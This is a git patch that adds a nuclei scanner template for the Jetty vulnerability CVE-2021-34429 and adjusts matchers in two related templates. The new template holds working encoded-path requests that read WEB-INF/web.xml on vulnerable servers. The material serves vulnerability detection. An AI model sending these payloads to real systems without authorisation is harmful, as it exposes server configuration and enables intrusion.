From 938fdeec8f8512fb9894ecedec54ffcd02d1bb70 Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Thu, 22 Jul 2021 15:23:19 +0530
Subject: [PATCH] Added CVE-2021-34429 and fixed related templates

---
 cves/2021/CVE-2021-28164.yaml |  2 +-
 cves/2021/CVE-2021-28169.yaml |  2 +-
 cves/2021/CVE-2021-34429.yaml | 35 +++++++++++++++++++++++++++++++++++
 3 files changed, 37 insertions(+), 2 deletions(-)
 create mode 100644 cves/2021/CVE-2021-34429.yaml

diff --git a/cves/2021/CVE-2021-28164.yaml b/cves/2021/CVE-2021-28164.yaml
index a62da7df33..859333bacb 100644
--- a/cves/2021/CVE-2021-28164.yaml
+++ b/cves/2021/CVE-2021-28164.yaml
@@ -24,7 +24,7 @@ requests:
 
       - type: word
         words:
-          - "<web-app>"
+          - "</web-app>"
           - "java.sun.com"
         part: body
         condition: and
diff --git a/cves/2021/CVE-2021-28169.yaml b/cves/2021/CVE-2021-28169.yaml
index 09ad71064e..00d2820a84 100644
--- a/cves/2021/CVE-2021-28169.yaml
+++ b/cves/2021/CVE-2021-28169.yaml
@@ -27,7 +27,7 @@ requests:
 
       - type: word
         words:
-          - "<web-app>"
+          - "</web-app>"
           - "java.sun.com"
         part: body
         condition: and
diff --git a/cves/2021/CVE-2021-34429.yaml b/cves/2021/CVE-2021-34429.yaml
new file mode 100644
index 0000000000..034033aa80
--- /dev/null
+++ b/cves/2021/CVE-2021-34429.yaml
@@ -0,0 +1,35 @@
+id: CVE-2021-34429
+
+info:
+  name: Jetty Authorization Before Parsing and Canonicalization Variation
+  author: Bernardo Rodrigues @bernardofsr | André Monteiro @am0nt31r0
+  severity: medium
+  description: |
+    For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.
+  reference: |
+    - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
+  tags: cve,cve2021,jetty
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/%u002e/WEB-INF/web.xml'
+      - '{{BaseURL}}/.%00/WEB-INF/web.xml'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "</web-app>"
+          - "java.sun.com"
+        part: body
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/xml"
\ No newline at end of file